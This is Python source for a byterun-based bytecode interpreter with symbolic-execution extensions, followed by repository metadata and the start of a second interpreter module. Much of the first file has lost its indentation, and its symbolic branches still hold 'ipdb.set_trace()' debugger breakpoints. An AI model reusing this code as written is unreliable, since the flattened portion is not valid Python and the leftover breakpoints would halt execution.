class VirtualMachineError(Exception):
    """Raised when the virtual machine itself (not the guest code) fails."""
class VirtualMachine(object):
def __init__(self, symbolic_on=False):
    """Create a new virtual machine.

    symbolic_on enables the symbolic-execution extensions (interesting
    paths, symex branch handling in the POP_JUMP_* opcodes).
    """
    # The call stack of frames.
    self.frames = []
    # The current frame.
    self.frame = None
    self.return_value = None
    self.last_exception = None
    self.symbolic_on = symbolic_on
    self.interesting_paths = {}  # code obj -> list(path)
    # Stack of the paths currently being followed (see fork/run_code).
    self._cur_interesting_path = []
    # code obj -> declaration / environment, populated by the
    # set_co_to_* setters; presumably filled in by the symex driver --
    # TODO confirm against caller.
    self._co_to_decls = {}
    self._co_to_envs = {}
def get_decl(self, code_obj):
return self._co_to_decls[code_obj]
def get_env(self, code_obj):
return self._co_to_envs[code_obj].copy()
def set_co_to_decls(self, co_to_decls):
self._co_to_decls.update(co_to_decls)
def set_co_to_envs(self, co_to_envs):
self._co_to_envs.update(co_to_envs)
@property
def cur_interesting_path(self):
return self._cur_interesting_path[-1]
def top(self):
    """Return the value at the top of the stack, with no changes."""
    return self.frame.stack[-1]

def pop(self, i=0):
    """Pop a value from the stack.

    Default to the top of the stack, but `i` can be a count from the top
    instead.
    """
    return self.frame.stack.pop(-1-i)

def push(self, *vals):
    """Push values onto the value stack."""
    self.frame.stack.extend(vals)
def popn(self, n):
    """Remove and return the top `n` stack values, deepest value first."""
    if not n:
        return []
    taken = self.frame.stack[-n:]
    del self.frame.stack[-n:]
    return taken
def peek(self, n):
    """Get a value `n` entries down in the stack, without changing the stack."""
    return self.frame.stack[-n]

def jump(self, jump):
    """Move the bytecode pointer to `jump`, so it will execute next."""
    self.frame.f_lasti = jump

def push_block(self, type, handler=None, level=None):
    """Push a Block (loop/except/finally/...) onto the frame's block stack.

    `level` defaults to the current data-stack depth, the point to
    unwind back to when the block is popped.
    """
    if level is None:
        level = len(self.frame.stack)
    self.frame.block_stack.append(Block(type, handler, level))

def pop_block(self):
    """Pop and return the innermost block from the frame's block stack."""
    return self.frame.block_stack.pop()
def make_frame(self, code, callargs=None, f_globals=None, f_locals=None):
    """Build (but do not run) a new Frame for `code`.

    `callargs` maps parameter names to bound argument values and is
    merged into the frame's locals.  If globals are not given, they are
    inherited from the current frame, or a minimal module-like namespace
    is synthesized for the outermost frame.
    """
    # Avoid a shared mutable default argument (previously `callargs={}`).
    if callargs is None:
        callargs = {}
    log.info("make_frame: code=%r, callargs=%s" % (code, repper(callargs)))
    if f_globals is not None:
        # Explicit globals; locals default to the same mapping
        # (module-level semantics).  The old no-op `f_globals = f_globals`
        # line has been dropped.
        if f_locals is None:
            f_locals = f_globals
    elif self.frames:
        # Nested call: inherit globals from the calling frame.
        f_globals = self.frame.f_globals
        f_locals = {}
    else:
        # Outermost frame: synthesize a fresh __main__-like namespace.
        f_globals = f_locals = {
            '__builtins__': __builtins__,
            '__name__': '__main__',
            '__doc__': None,
            '__package__': None,
        }
    f_locals.update(callargs)
    return Frame(code, f_globals, f_locals, self.frame)
def push_frame(self, frame):
    """Make `frame` the active frame, saving it on the call stack."""
    self.frames.append(frame)
    self.frame = frame

def pop_frame(self):
    """Discard the active frame and reactivate its caller (or None)."""
    self.frames.pop()
    self.frame = self.frames[-1] if self.frames else None
def print_frames(self):
"""Print the call stack, for debugging."""
for f in self.frames:
filename = f.f_code.co_filename
lineno = f.line_number()
print(' File "%s", line %d, in %s' % (
filename, lineno, f.f_code.co_name
))
linecache.checkcache(filename)
line = linecache.getline(filename, lineno, f.f_globals)
if line:
print(' ' + line.strip())
def resume_frame(self, frame):
frame.f_back = self.frame
val = self.run_frame(frame)
frame.f_back = None
return val
def add_interesting_path(self, code, path):
if code not in self.interesting_paths:
self.interesting_paths[code] = []
self.interesting_paths[code].append(path)
def fork(self, code, f_globals=None, f_locals=None):
newVM = VirtualMachine(self.symbolic_on)
newVM.interesting_paths = self.interesting_paths.copy()
newVM._co_to_decls = self._co_to_decls.copy()
newVM._co_to_envs = self._co_to_envs.copy()
newVM.frame = self.frame
val = newVM.run_code(code, f_globals=f_globals)
return val
def run_code(self, code, f_globals=None, f_locals=None):
frame = self.make_frame(code, f_globals=f_globals, f_locals=f_locals)
if self.symbolic_on:
paths = self.interesting_paths.get(code, [])
path = paths.pop(0) if paths else None
val = None
if path:
self._cur_interesting_path.append(path[1:]) # skip entry block
val = self.run_frame(frame)
# Check some invariants
if self.frames: # pragma: no cover
raise VirtualMachineError("Frames left over!")
if self.frame and self.frame.stack: # pragma: no cover
raise VirtualMachineError("Data left on stack! %r" % self.frame.stack)
return val
else:
val = self.run_frame(frame)
# Check some invariants
if self.frames: # pragma: no cover
raise VirtualMachineError("Frames left over!")
if self.frame and self.frame.stack: # pragma: no cover
raise VirtualMachineError("Data left on stack! %r" % self.frame.stack)
return val
def unwind_block(self, block):
if block.type == 'except-handler':
offset = 3
else:
offset = 0
while len(self.frame.stack) > block.level + offset:
self.pop()
if block.type == 'except-handler':
tb, value, exctype = self.popn(3)
self.last_exception = exctype, value, tb
def parse_byte_and_args(self):
""" Parse 1 - 3 bytes of bytecode into
an instruction and optionally arguments."""
f = self.frame
opoffset = f.f_lasti
byteCode = byteint(f.f_code.co_code[opoffset])
f.f_lasti += 1
byteName = dis.opname[byteCode]
arg = None
arguments = []
if byteCode >= dis.HAVE_ARGUMENT:
arg = f.f_code.co_code[f.f_lasti:f.f_lasti+2]
f.f_lasti += 2
intArg = byteint(arg[0]) + (byteint(arg[1]) << 8)
if byteCode in dis.hasconst:
arg = f.f_code.co_consts[intArg]
elif byteCode in dis.hasfree:
if intArg < len(f.f_code.co_cellvars):
arg = f.f_code.co_cellvars[intArg]
else:
var_idx = intArg - len(f.f_code.co_cellvars)
arg = f.f_code.co_freevars[var_idx]
elif byteCode in dis.hasname:
arg = f.f_code.co_names[intArg]
elif byteCode in dis.hasjrel:
arg = f.f_lasti + intArg
elif byteCode in dis.hasjabs:
arg = intArg
elif byteCode in dis.haslocal:
arg = f.f_code.co_varnames[intArg]
else:
arg = intArg
arguments = [arg]
return byteName, arguments, opoffset
def log(self, byteName, arguments, opoffset):
""" Log arguments, block stack, and data stack for each opcode."""
op = "%d: %s" % (opoffset, byteName)
if arguments:
op += " %r" % (arguments[0],)
indent = " "*(len(self.frames)-1)
stack_rep = repper(self.frame.stack)
block_stack_rep = repper(self.frame.block_stack)
log.info(" %sdata: %s" % (indent, stack_rep))
log.info(" %sblks: %s" % (indent, block_stack_rep))
log.info("%s%s" % (indent, op))
def dispatch(self, byteName, arguments):
    """Dispatch by bytename to the corresponding byte_* method.

    Exceptions raised by the operation are caught and recorded on the
    VM in self.last_exception; the return value is the "why" signal
    ('exception', 'return', 'break', ...) consumed by the block-stack
    unwinding machinery in run_frame.
    """
    # Leftover debug print replaced with a log call so normal runs do
    # not emit one stdout line per executed bytecode.
    log.debug('%s %s', byteName, arguments)
    why = None
    try:
        # Families of opcodes share generic handlers; everything else
        # dispatches to a byte_<NAME> method by reflection.
        if byteName.startswith('UNARY_'):
            self.unaryOperator(byteName[6:])
        elif byteName.startswith('BINARY_'):
            self.binaryOperator(byteName[7:])
        elif byteName.startswith('INPLACE_'):
            self.inplaceOperator(byteName[8:])
        elif 'SLICE+' in byteName:
            self.sliceOperator(byteName)
        else:
            bytecode_fn = getattr(self, 'byte_%s' % byteName, None)
            if not bytecode_fn:  # pragma: no cover
                raise VirtualMachineError(
                    "unknown bytecode type: %s" % byteName
                )
            why = bytecode_fn(*arguments)
    except:  # noqa: E722 -- the VM must trap *everything* guest code raises
        # Deal with exceptions encountered while executing the op.
        self.last_exception = sys.exc_info()[:2] + (None,)
        log.exception("Caught exception during execution")
        why = 'exception'
    return why
def manage_block_stack(self, why):
""" Manage a frame's block stack.
Manipulate the block stack and data stack for looping,
exception handling, or returning."""
assert why != 'yield'
block = self.frame.block_stack[-1]
if block.type == 'loop' and why == 'continue':
self.jump(self.return_value)
why = None
return why
self.pop_block()
self.unwind_block(block)
if block.type == 'loop' and why == 'break':
why = None
self.jump(block.handler)
return why
if PY2:
if (
block.type == 'finally' or
(block.type == 'setup-except' and why == 'exception') or
block.type == 'with'
):
if why == 'exception':
exctype, value, tb = self.last_exception
self.push(tb, value, exctype)
else:
if why in ('return', 'continue'):
self.push(self.return_value)
self.push(why)
why = None
self.jump(block.handler)
return why
elif PY3:
if (
why == 'exception' and
block.type in ['setup-except', 'finally']
):
self.push_block('except-handler')
exctype, value, tb = self.last_exception
self.push(tb, value, exctype)
# PyErr_Normalize_Exception goes here
self.push(tb, value, exctype)
why = None
self.jump(block.handler)
return why
elif block.type == 'finally':
if why in ('return', 'continue'):
self.push(self.return_value)
self.push(why)
why = None
self.jump(block.handler)
return why
return why
def run_frame(self, frame):
"""Run a frame until it returns (somehow).
Exceptions are raised, the return value is returned.
"""
self.push_frame(frame)
while True:
byteName, arguments, opoffset = self.parse_byte_and_args()
if log.isEnabledFor(logging.INFO):
self.log(byteName, arguments, opoffset)
# When unwinding the block stack, we need to keep track of why we
# are doing it.
why = self.dispatch(byteName, arguments)
if why == 'exception':
# TODO: ceval calls PyTraceBack_Here, not sure what that does.
pass
if why == 'reraise':
why = 'exception'
if why != 'yield':
while why and frame.block_stack:
# Deal with any block management we need to do.
why = self.manage_block_stack(why)
if why:
break
# TODO: handle generator exception state
self.pop_frame()
if why == 'exception':
six.reraise(*self.last_exception)
return self.return_value
## Stack manipulation
def byte_LOAD_CONST(self, const):
self.push(const)
def byte_POP_TOP(self):
self.pop()
def byte_DUP_TOP(self):
self.push(self.top())
def byte_DUP_TOPX(self, count):
    """Duplicate the top `count` stack items, preserving their order."""
    items = self.popn(count)
    self.push(*items)
    self.push(*items)
def byte_DUP_TOP_TWO(self):
# Py3 only
a, b = self.popn(2)
self.push(a, b, a, b)
def byte_ROT_TWO(self):
a, b = self.popn(2)
self.push(b, a)
def byte_ROT_THREE(self):
a, b, c = self.popn(3)
self.push(c, a, b)
def byte_ROT_FOUR(self):
a, b, c, d = self.popn(4)
self.push(d, a, b, c)
## Names
def byte_LOAD_NAME(self, name):
frame = self.frame
if name in frame.f_locals:
val = frame.f_locals[name]
elif name in frame.f_globals:
val = frame.f_globals[name]
elif name in frame.f_builtins:
val = frame.f_builtins[name]
else:
raise NameError("name '%s' is not defined" % name)
self.push(val)
def byte_STORE_NAME(self, name):
self.frame.f_locals[name] = self.pop()
def byte_DELETE_NAME(self, name):
del self.frame.f_locals[name]
def byte_LOAD_FAST(self, name):
if name in self.frame.f_locals:
val = self.frame.f_locals[name]
else:
raise UnboundLocalError(
"local variable '%s' referenced before assignment" % name
)
self.push(val)
def byte_STORE_FAST(self, name):
self.frame.f_locals[name] = self.pop()
def byte_DELETE_FAST(self, name):
del self.frame.f_locals[name]
def byte_LOAD_GLOBAL(self, name):
f = self.frame
if name in f.f_globals:
val = f.f_globals[name]
elif name in f.f_builtins:
val = f.f_builtins[name]
else:
raise NameError("global name '%s' is not defined" % name)
self.push(val)
def byte_LOAD_DEREF(self, name):
self.push(self.frame.cells[name].get())
def byte_STORE_DEREF(self, name):
self.frame.cells[name].set(self.pop())
def byte_LOAD_LOCALS(self):
self.push(self.frame.f_locals)
## Operators
UNARY_OPERATORS = {
'POSITIVE': operator.pos,
'NEGATIVE': operator.neg,
'NOT': operator.not_,
'CONVERT': repr,
'INVERT': operator.invert,
}
def unaryOperator(self, op):
x = self.pop()
self.push(self.UNARY_OPERATORS[op](x))
BINARY_OPERATORS = {
'POWER': pow,
'MULTIPLY': operator.mul,
'DIVIDE': getattr(operator, 'div', lambda x, y: None),
'FLOOR_DIVIDE': operator.floordiv,
'TRUE_DIVIDE': operator.truediv,
'MODULO': operator.mod,
'ADD': operator.add,
'SUBTRACT': operator.sub,
'SUBSCR': operator.getitem,
'LSHIFT': operator.lshift,
'RSHIFT': operator.rshift,
'AND': operator.and_,
'XOR': operator.xor,
'OR': operator.or_,
}
def binaryOperator(self, op):
x, y = self.popn(2)
self.push(self.BINARY_OPERATORS[op](x, y))
def inplaceOperator(self, op):
    """Implement the INPLACE_* opcodes: pop x and y, push `x OP= y`.

    NOTE(review): 'DIVIDE' is handled with //= together with
    FLOOR_DIVIDE; under Python 2 classic division on floats this is not
    equivalent to the real INPLACE_DIVIDE -- confirm this is intended.
    """
    x, y = self.popn(2)
    if op == 'POWER':
        x **= y
    elif op == 'MULTIPLY':
        x *= y
    elif op in ['DIVIDE', 'FLOOR_DIVIDE']:
        x //= y
    elif op == 'TRUE_DIVIDE':
        x /= y
    elif op == 'MODULO':
        x %= y
    elif op == 'ADD':
        x += y
    elif op == 'SUBTRACT':
        x -= y
    elif op == 'LSHIFT':
        x <<= y
    elif op == 'RSHIFT':
        x >>= y
    elif op == 'AND':
        x &= y
    elif op == 'XOR':
        x ^= y
    elif op == 'OR':
        x |= y
    else:  # pragma: no cover
        raise VirtualMachineError("Unknown in-place operator: %r" % op)
    self.push(x)
def sliceOperator(self, op):
    """Implement the Python 2 *SLICE+N opcode family.

    The trailing digit of the opcode name says how many of start/end
    are taken from the stack; the object being sliced sits below them.
    """
    op, count = op[:-2], int(op[-1])
    start, end = 0, None
    if count == 1:
        start = self.pop()
    elif count == 2:
        end = self.pop()
    elif count == 3:
        end = self.pop()
        start = self.pop()
    target = self.pop()
    if end is None:
        end = len(target)
    if op.startswith('STORE_'):
        target[start:end] = self.pop()
    elif op.startswith('DELETE_'):
        del target[start:end]
    else:
        self.push(target[start:end])
COMPARE_OPERATORS = [
operator.lt,
operator.le,
operator.eq,
operator.ne,
operator.gt,
operator.ge,
#lambda x, y: x in y,
symex.symbolic_in,
lambda x, y: x not in y,
#lambda x, y: x is y,
symex.symbolic_is,
lambda x, y: x is not y,
lambda x, y: issubclass(x, Exception) and issubclass(x, y),
]
def byte_COMPARE_OP(self, opnum):
x, y = self.popn(2)
self.push(self.COMPARE_OPERATORS[opnum](x, y))
## Attributes and indexing
def byte_LOAD_ATTR(self, attr):
obj = self.pop()
val = getattr(obj, attr)
self.push(val)
def byte_STORE_ATTR(self, name):
val, obj = self.popn(2)
setattr(obj, name, val)
def byte_DELETE_ATTR(self, name):
obj = self.pop()
delattr(obj, name)
def byte_STORE_SUBSCR(self):
val, obj, subscr = self.popn(3)
obj[subscr] = val
def byte_DELETE_SUBSCR(self):
obj, subscr = self.popn(2)
del obj[subscr]
## Building
def byte_BUILD_TUPLE(self, count):
elts = self.popn(count)
self.push(tuple(elts))
def byte_BUILD_LIST(self, count):
elts = self.popn(count)
self.push(elts)
def byte_BUILD_SET(self, count):
# TODO: Not documented in Py2 docs.
elts = self.popn(count)
self.push(set(elts))
def byte_BUILD_MAP(self, size):
# size is ignored.
self.push({})
def byte_STORE_MAP(self):
the_map, val, key = self.popn(3)
the_map[key] = val
self.push(the_map)
def byte_UNPACK_SEQUENCE(self, count):
seq = self.pop()
for x in reversed(seq):
self.push(x)
def byte_BUILD_SLICE(self, count):
if count == 2:
x, y = self.popn(2)
self.push(slice(x, y))
elif count == 3:
x, y, z = self.popn(3)
self.push(slice(x, y, z))
else: # pragma: no cover
raise VirtualMachineError("Strange BUILD_SLICE count: %r" % count)
def byte_LIST_APPEND(self, count):
val = self.pop()
the_list = self.peek(count)
the_list.append(val)
def byte_SET_ADD(self, count):
val = self.pop()
the_set = self.peek(count)
the_set.add(val)
def byte_MAP_ADD(self, count):
val, key = self.popn(2)
the_map = self.peek(count)
the_map[key] = val
## Printing
if 0: # Only used in the interactive interpreter, not in modules.
def byte_PRINT_EXPR(self):
print(self.pop())
def byte_PRINT_ITEM(self):
item = self.pop()
self.print_item(item)
def byte_PRINT_ITEM_TO(self):
to = self.pop()
item = self.pop()
self.print_item(item, to)
def byte_PRINT_NEWLINE(self):
self.print_newline()
def byte_PRINT_NEWLINE_TO(self):
to = self.pop()
self.print_newline(to)
def print_item(self, item, to=None):
if to is None:
to = sys.stdout
if to.softspace:
print(" ", end="", file=to)
to.softspace = 0
print(item, end="", file=to)
if isinstance(item, str):
if (not item) or (not item[-1].isspace()) or (item[-1] == " "):
to.softspace = 1
else:
to.softspace = 1
def print_newline(self, to=None):
if to is None:
to = sys.stdout
print("", file=to)
to.softspace = 0
## Jumps
def byte_JUMP_FORWARD(self, jump):
self.jump(jump)
def byte_JUMP_ABSOLUTE(self, jump):
self.jump(jump)
if 0: # Not in py2.7
def byte_JUMP_IF_TRUE(self, jump):
val = self.top()
if val:
self.jump(jump)
def byte_JUMP_IF_FALSE(self, jump):
val = self.top()
if not val:
self.jump(jump)
def byte_POP_JUMP_IF_TRUE_SYM(self, jump):
val = self.pop()
if isinstance(val, symex.SymbolicVar):
branch_cond = self.cur_interesting_path.pop(0)[1]
if branch_cond == 'TRUE':
val.isTrue()
self.jump(jump)
elif branch_cond == 'FALSE':
val.isFalse()
else:
import ipdb
ipdb.set_trace()
pass
else:
if val:
self.jump(jump)
def byte_POP_JUMP_IF_TRUE(self, jump):
if self.symbolic_on:
self.byte_POP_JUMP_IF_TRUE_SYM(jump)
else:
val = self.pop()
if val:
self.jump(jump)
def byte_POP_JUMP_IF_FALSE_SYM(self, jump):
val = self.pop()
if isinstance(val, symex.SymbolicVar):
branch_cond = self.cur_interesting_path.pop(0)[1]
if branch_cond == 'TRUE':
val.isTrue()
elif branch_cond == 'FALSE':
val.isFalse()
self.jump(jump)
else:
import ipdb
ipdb.set_trace()
pass
else:
if not val:
self.jump(jump)
def byte_POP_JUMP_IF_FALSE(self, jump):
if self.symbolic_on:
self.byte_POP_JUMP_IF_FALSE_SYM(jump)
else:
val = self.pop()
if not val:
self.jump(jump)
def byte_JUMP_IF_TRUE_OR_POP(self, jump):
val = self.top()
if val:
self.jump(jump)
else:
self.pop()
def byte_JUMP_IF_FALSE_OR_POP(self, jump):
val = self.top()
if not val:
self.jump(jump)
else:
self.pop()
## Blocks
def byte_SETUP_LOOP(self, dest):
self.push_block('loop', dest)
def byte_GET_ITER(self):
self.push(iter(self.pop()))
def byte_FOR_ITER(self, jump):
iterobj = self.top()
try:
v = next(iterobj)
self.push(v)
except StopIteration:
self.pop()
self.jump(jump)
def byte_BREAK_LOOP(self):
return 'break'
def byte_CONTINUE_LOOP(self, dest):
# This is a trick with the return value.
# While unrolling blocks, continue and return both have to preserve
# state as the finally blocks are executed. For continue, it's
# where to jump to, for return, it's the value to return. It gets
# pushed on the stack for both, so continue puts the jump destination
# into return_value.
self.return_value = dest
return 'continue'
def byte_SETUP_EXCEPT(self, dest):
self.push_block('setup-except', dest)
def byte_SETUP_FINALLY(self, dest):
self.push_block('finally', dest)
def byte_END_FINALLY(self):
v = self.pop()
if isinstance(v, str):
why = v
if why in ('return', 'continue'):
self.return_value = self.pop()
if why == 'silenced': # PY3
block = self.pop_block()
assert block.type == 'except-handler'
self.unwind_block(block)
why = None
elif v is None:
why = None
elif issubclass(v, BaseException):
exctype = v
val = self.pop()
tb = self.pop()
self.last_exception = (exctype, val, tb)
why = 'reraise'
else: # pragma: no cover
raise VirtualMachineError("Confused END_FINALLY")
return why
def byte_POP_BLOCK(self):
self.pop_block()
if PY2:
def byte_RAISE_VARARGS(self, argc):
# NOTE: the dis docs are completely wrong about the order of the
# operands on the stack!
exctype = val = tb = None
if argc == 0:
exctype, val, tb = self.last_exception
elif argc == 1:
exctype = self.pop()
elif argc == 2:
val = self.pop()
exctype = self.pop()
elif argc == 3:
tb = self.pop()
val = self.pop()
exctype = self.pop()
# There are a number of forms of "raise", normalize them somewhat.
if isinstance(exctype, BaseException):
val = exctype
exctype = type(val)
self.last_exception = (exctype, val, tb)
if tb:
return 'reraise'
else:
return 'exception'
elif PY3:
def byte_RAISE_VARARGS(self, argc):
cause = exc = None
if argc == 2:
cause = self.pop()
exc = self.pop()
elif argc == 1:
exc = self.pop()
return self.do_raise(exc, cause)
def do_raise(self, exc, cause):
if exc is None: # reraise
exc_type, val, tb = self.last_exception
if exc_type is None:
return 'exception' # error
else:
return 'reraise'
elif type(exc) == type:
# As in `raise ValueError`
exc_type = exc
val = exc() # Make an instance.
elif isinstance(exc, BaseException):
# As in `raise ValueError('foo')`
exc_type = type(exc)
val = exc
else:
return 'exception' # error
# If you reach this point, you're guaranteed that
# val is a valid exception instance and exc_type is its class.
# Now do a similar thing for the cause, if present.
if cause:
if type(cause) == type:
cause = cause()
elif not isinstance(cause, BaseException):
return 'exception' # error
val.__cause__ = cause
self.last_exception = exc_type, val, val.__traceback__
return 'exception'
def byte_POP_EXCEPT(self):
block = self.pop_block()
if block.type != 'except-handler':
raise Exception("popped block is not an except handler")
self.unwind_block(block)
def byte_SETUP_WITH(self, dest):
ctxmgr = self.pop()
self.push(ctxmgr.__exit__)
ctxmgr_obj = ctxmgr.__enter__()
if PY2:
self.push_block('with', dest)
elif PY3:
self.push_block('finally', dest)
self.push(ctxmgr_obj)
def byte_WITH_CLEANUP(self):
# The code here does some weird stack manipulation: the exit function
# is buried in the stack, and where depends on what's on top of it.
# Pull out the exit function, and leave the rest in place.
v = w = None
u = self.top()
if u is None:
exit_func = self.pop(1)
elif isinstance(u, str):
if u in ('return', 'continue'):
exit_func = self.pop(2)
else:
exit_func = self.pop(1)
u = None
elif issubclass(u, BaseException):
if PY2:
w, v, u = self.popn(3)
exit_func = self.pop()
self.push(w, v, u)
elif PY3:
w, v, u = self.popn(3)
tp, exc, tb = self.popn(3)
exit_func = self.pop()
self.push(tp, exc, tb)
self.push(None)
self.push(w, v, u)
block = self.pop_block()
assert block.type == 'except-handler'
self.push_block(block.type, block.handler, block.level-1)
else: # pragma: no cover
raise VirtualMachineError("Confused WITH_CLEANUP")
exit_ret = exit_func(u, v, w)
err = (u is not None) and bool(exit_ret)
if err:
# An error occurred, and was suppressed
if PY2:
self.popn(3)
self.push(None)
elif PY3:
self.push('silenced')
## Functions
def byte_MAKE_FUNCTION(self, argc):
if PY3:
name = self.pop()
else:
name = None
code = self.pop()
defaults = self.popn(argc)
globs = self.frame.f_globals
fn = Function(name, code, globs, defaults, None, self)
self.push(fn)
def byte_LOAD_CLOSURE(self, name):
self.push(self.frame.cells[name])
def byte_MAKE_CLOSURE(self, argc):
if PY3:
# TODO: the py3 docs don't mention this change.
name = self.pop()
else:
name = None
closure, code = self.popn(2)
defaults = self.popn(argc)
globs = self.frame.f_globals
fn = Function(name, code, globs, defaults, closure, self)
self.push(fn)
def byte_CALL_FUNCTION(self, arg):
return self.call_function(arg, [], {})
def byte_CALL_FUNCTION_VAR(self, arg):
args = self.pop()
return self.call_function(arg, args, {})
def byte_CALL_FUNCTION_KW(self, arg):
kwargs = self.pop()
return self.call_function(arg, [], kwargs)
def byte_CALL_FUNCTION_VAR_KW(self, arg):
args, kwargs = self.popn(2)
return self.call_function(arg, args, kwargs)
def call_function(self, arg, args, kwargs):
lenKw, lenPos = divmod(arg, 256)
namedargs = {}
for i in range(lenKw):
key, val = self.popn(2)
namedargs[key] = val
namedargs.update(kwargs)
posargs = self.popn(lenPos)
posargs.extend(args)
func = self.pop()
frame = self.frame
ffunc = func
if hasattr(func, 'im_func'):
# Methods get self as an implicit first parameter.
if func.im_self:
posargs.insert(0, func.im_self)
# The first parameter must be the correct type.
if not isinstance(posargs[0], func.im_class):
raise TypeError(
'unbound method %s() must be called with %s instance '
'as first argument (got %s instance instead)' % (
func.im_func.func_name,
func.im_class.__name__,
type(posargs[0]).__name__,
)
)
func = func.im_func
if self.symbolic_on:
if isinstance(func, Function):
func = func._func
if not hasattr(func, 'func_code'):
import ipdb
ipdb.set_trace()
retval = func(*posargs, **namedargs)
elif func.func_code in self.interesting_paths:
import ipdb
ipdb.set_trace()
# setup env from posargs and namedargs
decl = self.get_decl(func.func_code)
env = self.get_env(decl.parent_module.code_object)
func_args = inspect.getargspec(func)
argnames = func_args.args[:]
posargs_copy = posargs[:]
namedargs_copy = namedargs.copy()
defaults = func_args.defaults
defaults_copy = list(defaults) if defaults is not None else None
for name, var in zip(func_args.args, posargs):
env[name] = var
argnames.pop(0)
posargs_copy.pop(0)
# if all posargs were used up, use kwargs
for argname in argnames:
if argname in namedargs:
env[argname] = namedargs[argname]
namedargs_copy.pop(argname)
else:
env[argname] = defaults_copy.pop(0)
if func_args.varargs:
env[func_args.varargs] = []
for var in posargs_copy:
env[func_args.varargs].append(var)
if func_args.keywords:
env[func_args.keywords] = {}
for name, val in namedargs_copy.iteritems():
env[func_args.keywords][name] = val
# XXX(soh): handles closure
closures = func.func_closure or []
for closure in closures:
import ipdb
ipdb.set_trace()
cell_contents = closure.cell_contents
if not self.frame.cells:
self.frame.cells = {}
for var in func.func_code.co_freevars:
cell = Cell(cell_contents)
self.frame.cells[var] = cell
import ipdb
ipdb.set_trace()
retval = self.fork(func.func_code, f_globals=env)
else:
retval = func(*posargs, **namedargs)
else:
retval = func(*posargs, **namedargs)
self.push(retval)
def byte_RETURN_VALUE(self):
self.return_value = self.pop()
if self.frame.generator:
self.frame.generator.finished = True
return "return"
def byte_YIELD_VALUE(self):
self.return_value = self.pop()
return "yield"
def byte_YIELD_FROM(self):
u = self.pop()
x = self.top()
try:
if not isinstance(x, Generator) or u is None:
# Call next on iterators.
retval = next(x)
else:
retval = x.send(u)
self.return_value = retval
except StopIteration as e:
self.pop()
self.push(e.value)
else:
# YIELD_FROM decrements f_lasti, so that it will be called
# repeatedly until a StopIteration is raised.
self.jump(self.frame.f_lasti - 1)
# Returning "yield" prevents the block stack cleanup code
# from executing, suspending the frame in its current state.
return "yield"
## Importing
def byte_IMPORT_NAME(self, name):
level, fromlist = self.popn(2)
frame = self.frame
self.push(
__import__(name, frame.f_globals, frame.f_locals, fromlist, level)
)
def byte_IMPORT_STAR(self):
# TODO: this doesn't use __all__ properly.
mod = self.pop()
for attr in dir(mod):
if attr[0] != '_':
self.frame.f_locals[attr] = getattr(mod, attr)
def byte_IMPORT_FROM(self, name):
mod = self.top()
self.push(getattr(mod, name))
## And the rest...
def byte_EXEC_STMT(self):
stmt, globs, locs = self.popn(3)
six.exec_(stmt, globs, locs)
if PY2:
def byte_BUILD_CLASS(self):
name, bases, methods = self.popn(3)
self.push(type(name, bases, methods))
elif PY3:
def byte_LOAD_BUILD_CLASS(self):
# New in py3
self.push(__build_class__)
def byte_STORE_LOCALS(self):
self.frame.f_locals = self.pop()
if 0: # Not in py2.7
def byte_SET_LINENO(self, lineno):
self.frame.f_lineno = lineno
| {
"repo_name": "sukwon0709/byterun",
"path": "byterun/pyvm2.py",
"copies": "1",
"size": "37105",
"license": "mit",
"hash": -8876592344558702000,
"line_mean": 30.1806722689,
"line_max": 90,
"alpha_frac": 0.5074787764,
"autogenerated": false,
"ratio": 3.861885928393006,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.986420818112502,
"avg_score": 0.0010313047335972765,
"num_lines": 1190
} |
"""A pure-Python Python bytecode interpreter."""
# Derived from Byterun by Ned Batchelder, based on pyvm2 by Paul
# Swartz (z3p), from http://www.twistedmatrix.com/users/z3p/
import builtins, dis, operator, types
class Function:
    """Guest-level function object for the interpreter.

    Mirrors the attributes of a real Python function; calling it binds
    the arguments to the code object's parameters and runs the code via
    run_frame (defined later in this module).
    """

    __slots__ = [
        '__name__', '__code__', '__globals__', '__defaults__', '__closure__',
        '__dict__', '__doc__',
    ]

    def __init__(self, name, code, globs, defaults, closure):
        self.__name__ = name or code.co_name
        self.__code__ = code
        self.__globals__ = globs
        self.__defaults__ = tuple(defaults)
        self.__closure__ = closure
        self.__dict__ = {}
        # By CPython convention the docstring, if any, is the first constant.
        self.__doc__ = code.co_consts[0] if code.co_consts else None

    def __repr__(self):  # pragma: no cover
        return '<Function %s at 0x%08x>' % (self.__name__, id(self))

    def __get__(self, instance, owner):
        # Descriptor protocol: access through an instance yields a bound
        # Method; access through the class yields the plain function.
        return self if instance is None else Method(instance, owner, self)

    def __call__(self, *args, **kwargs):
        """Bind *args/**kwargs to the parameters and execute the code."""
        code = self.__code__
        argc = code.co_argcount
        # CO_VARARGS / CO_VARKEYWORDS flags of the code object.
        varargs = 0 != (code.co_flags & 0x04)
        varkws = 0 != (code.co_flags & 0x08)
        # Named parameters, including the *args/**kwargs slots if present.
        params = code.co_varnames[slice(0, argc+varargs+varkws)]
        defaults = self.__defaults__
        # Negative index: the last len(defaults) positional parameters
        # have defaults; with no defaults, all argc parameters are required.
        nrequired = -len(defaults) if defaults else argc
        # Seed locals with defaults, then overwrite with positionals.
        f_locals = dict(zip(params[slice(nrequired, None)], defaults))
        f_locals.update(dict(zip(params, args)))
        if varargs:
            # Extra positionals collect into the *args parameter.
            f_locals[params[argc]] = args[slice(argc, None)]
        elif argc < len(args):
            raise TypeError("%s() takes up to %d positional argument(s) but got %d"
                            % (self.__name__, argc, len(args)))
        if varkws:
            f_locals[params[-1]] = varkw_dict = {}
        for kw, value in kwargs.items():
            if kw in params:
                f_locals[kw] = value
            elif varkws:
                varkw_dict[kw] = value
            else:
                raise TypeError("%s() got an unexpected keyword argument %r"
                                % (self.__name__, kw))
        missing = [v for v in params[slice(0, nrequired)] if v not in f_locals]
        if missing:
            raise TypeError("%s() missing %d required positional argument%s: %s"
                            % (code.co_name,
                               len(missing), 's' if 1 < len(missing) else '',
                               ', '.join(map(repr, missing))))
        return run_frame(code, self.__closure__, self.__globals__, f_locals)
class Method:
    """A bound method: couples an instance with the function to invoke."""

    def __init__(self, obj, _class, func):
        self.__self__ = obj
        self._class = _class
        self.__func__ = func

    def __repr__(self):  # pragma: no cover
        qualname = "%s.%s" % (self._class.__name__, self.__func__.__name__)
        return '<bound method %s of %s>' % (qualname, self.__self__)

    def __call__(self, *args, **kwargs):
        # Prepend the bound instance as the implicit first argument.
        return self.__func__(self.__self__, *args, **kwargs)
class Cell:
    """A closure cell: a single mutable slot exposed as ``contents``."""
